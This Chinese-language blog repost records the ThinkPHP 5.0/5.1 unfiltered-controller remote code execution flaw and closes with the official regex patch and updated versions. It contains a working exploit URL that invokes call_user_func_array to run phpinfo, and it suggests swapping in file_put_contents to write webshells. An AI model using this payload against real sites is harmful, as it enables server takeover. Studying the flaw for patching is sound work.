首頁 > php框架 > ThinkPHP > 主體

記錄thinkphp5.0和5.1的getshell漏洞

藏色散人
發布: 2020-08-12 13:51:53
轉載
5193 人瀏覽過

下面由thinkphp框架教學欄位來介紹thinkphp5.0和5.1的getshell漏洞,希望對需要的朋友有幫助!

記錄thinkphp5.0和5.1的getshell漏洞

之前網站被提權了,那時候網站才建沒幾天,應該不會有人故意為之,可能是批量掃描getshell的,為了方便我找的是開源系統thinkcmf建了博客,看著挺不錯的,因為thinkcmf用的是thinkphp5.0的框架開發的,我到thinkphp.cn上去看了一下,原來有一個提權漏洞。

libaray/think/app.php檔案中模組,控制器,方法使用的是/來區分開來。

然後並沒有對控制器進行過濾,導致可以建構執行各種函數

記錄thinkphp5.0和5.1的getshell漏洞

記錄thinkphp5.0和5.1的getshell漏洞

記錄thinkphp5.0和5.1的getshell漏洞

我在本地建立一個虛擬主機測試http://cmf.com

建構一個url訪問,可以直接列印出phpinfo:

http://cmf.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
登入後複製

記錄thinkphp5.0和5.1的getshell漏洞

然後你可以把phpinfo換成其他函數,例如使用file_put_content函數來建立各種大馬小馬檔案。

TP官方的修復5.0方法是:

think\App類別的module方法的取得控制器的程式碼後面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
登入後複製

我用的thinkcmf的版本是:ThinkCMF 5.0.180901

然後我看了一下thinkcmf的官網已經更新到5.0.190111,最新版也更新了tp5.0到最新版本5.0.24了包含了安全性更新,當然也沒有這個提權漏洞了。

 

以上是記錄thinkphp5.0和5.1的getshell漏洞的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:csdn.net
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板
關於我們 免責聲明 Sitemap
PHP中文網:公益線上PHP培訓,幫助PHP學習者快速成長!